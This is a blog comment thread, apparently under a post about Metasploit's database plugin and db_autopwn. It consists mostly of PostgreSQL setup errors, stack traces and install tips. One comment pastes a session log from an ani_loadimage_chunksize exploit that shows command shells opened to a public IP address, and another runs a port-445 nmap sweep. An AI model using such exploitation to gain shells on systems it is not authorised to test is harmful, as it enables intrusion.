The postgres plugin loads successfully, however when trying to db_create, it carries on running, please help
>> load db_postgres
[*] Successfully loaded plugin: db_postgres
>> db_create
[-] Error while running command db_create: No such file or directory - psql -q metasploit3
Call stack:
C:/Program Files/Metasploit/Framework3/framework/plugins/db_postgres.rb:119:in `popen'
C:/Program Files/Metasploit/Framework3/framework/plugins/db_postgres.rb:119:in `cmd_db_create'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:230:in `send'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:230:in `run_command'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/shell.rb:125:in `run'
./script/../config/../config/../../../lib/msf/ui/web/console.rb:63:in `initialize'
./script/../config/../config/../../../lib/msf/ui/web/console.rb:63:in `new'
./script/../config/../config/../../../lib/msf/ui/web/console.rb:63:in `initialize'
./script/../config/../config/../../../lib/msf/ui/web/driver.rb:62:in `new'
./script/../config/../config/../../../lib/msf/ui/web/driver.rb:62:in `create_console'
./script/../config/../app/controllers/console_controller.rb:15:in `index'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:1095:in `send'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:1095:in `perform_action_without_filters'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/filters.rb:632:in `call_filter'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/filters.rb:619:in `perform_action_without_benchmark'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/benchmarking.rb:66:in `perform_action_without_rescue'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/benchmark.rb:293:in `measure'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/benchmarking.rb:66:in `perform_action_without_rescue'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/rescue.rb:83:in `perform_action'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:430:in `send'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:430:in `process_without_filters'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/filters.rb:624:in `process_without_session_management_support'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/session_management.rb:114:in `process'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:330:in `process'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/dispatcher.rb:41:in `dispatch'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/webrick_server.rb:113:in `handle_dispatch'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/webrick_server.rb:79:in `service'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/httpserver.rb:104:in `service'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/httpserver.rb:65:in `run'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:162:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:95:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:92:in `each'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:92:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:23:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:82:in `start'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/webrick_server.rb:63:in `dispatch'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/commands/servers/webrick.rb:59
C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `gem_original_require'
C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `require'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/activesupport-1.4.1/lib/active_support/dependencies.rb:495:in `require'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/activesupport-1.4.1/lib/active_support/dependencies.rb:342:in `new_constants_in'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/activesupport-1.4.1/lib/active_support/dependencies.rb:495:in `require'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/commands/server.rb:39
C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `gem_original_require'
C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `require'
./script/server:3
C:/Program Files/Metasploit/Framework3/framework/msfweb:82:in `load'
C:/Program Files/Metasploit/Framework3/framework/msfweb:82
(running)
Is db_autopwn a Linux only feature? On the windows app whenever it reaches the nmap step it says db_nmap is a unrecognized command. And I have nmap 4.20 already installed... answers would be greatly appreciated
HD,
I saw your "Tactical Exploitation" talk in Vegas earlier this month and attended the Q&A at Defcon 15. The demo of smb_relay was really eye opening. I really appreciate all the efforts of your team. The framework has really come a long way since I first started using it.
It was nice to see that you guys decided to bring it back the roots and educate some of the younger guys on the topic of "CREATIVITY". I'm certain that creativity alone is what differentiates script kiddies from security professionals.
Keep up the good work!
Hi,
when I execute
db_nmap -p 445 192.168.2.0/24
I get the following:
Error while running command db_nmap: FATAL C28000 Mno PostgreSQL user name specified in startup packet Fpostmaster.c L1528 RProcessStartupPacket
(nmap finishes fine, this message comes after)
db_create seems to work fine (tables are created)
I'm not quite sure about the ruby-postgres library as I get an error when I do this check :
ruby -e 'require "rubygems"; require_gem "postgres";'
Could you help if it's a database setting problem or something wrong with the ruby-postgres library installation ?
Thanks
seriously cool stuff this, many thanks to all you involved
I've been googling trying to find answers to the error message I've been getting. I typed in the below commands on the console and it tells me that the metasploit3 database doesn't exist:
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > db_create
FATAL: database "metasploit3" does not exist
psql: FATAL: database "metasploit3" does not exist
[*] Database creation complete (check for errors)
I'am trying but it didn't work:
db_create:
Is the server running locally and accepting
connections on Unix domain socket "/tmp/.s.PGSQL.5432"?
psql: could not connect to server: No such file or directory
Is the server running locally and accepting
connections on Unix domain socket "/tmp/.s.PGSQL.5432"?
[*] Database creation complete (check for errors)
Hope someone can help me..
best regards
I usually get command shells except when I try to use them either:
1.) when I use the sessions -i 1 it automatically closes
2.) it's just a blank screen.
LOG:
msf exploit(ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
2 Command shell 192.168.0.102:3690 -> 74.14.102.76:63294
3 Command shell 192.168.0.102:59389 -> 74.14.102.76:3690
4 Command shell 192.168.0.102:3690 -> 74.14.102.76:63296
5 Command shell 192.168.0.102:38573 -> 74.14.102.76:3690
msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...
[*] Command shell session 2 closed.
every thing has been working great with the automated version of metasploit but i cant figure out which payload has worked out for me.
is thr any way i could find that out
Run 'sessions -l -v', it will show you what exploit launched it.
For people who use OS X: I had a lot of trouble getting "gem install postgres" to work. If you're getting an error saying it can't find the libraries and whatnot, you have to install postgres-devel-82 (not exactly sure on the name, but its close). If you still get an error, set ARCHFLAGS and try again by doing a "sudo env ARCHFLAGS="-arch i386" gem install postgres". If that doesn't work, Google.
Got it working on a new MacBook Pro. Unfortunately, the XP VM I have loaded was completely patched, so no success with consoles.
for the errors of postgres, you have to start the instance of postgres with other user (not root), then you can return to root; and when you load the db_postgres you have to use the command "db_create user:pass@host:port/db" and you have to put for user, the user that you use to start the instance of postgres and for the pass you can use anything, then the DB will work with no problems
Post a Comment
Links to this post:
Create a Link
<< Home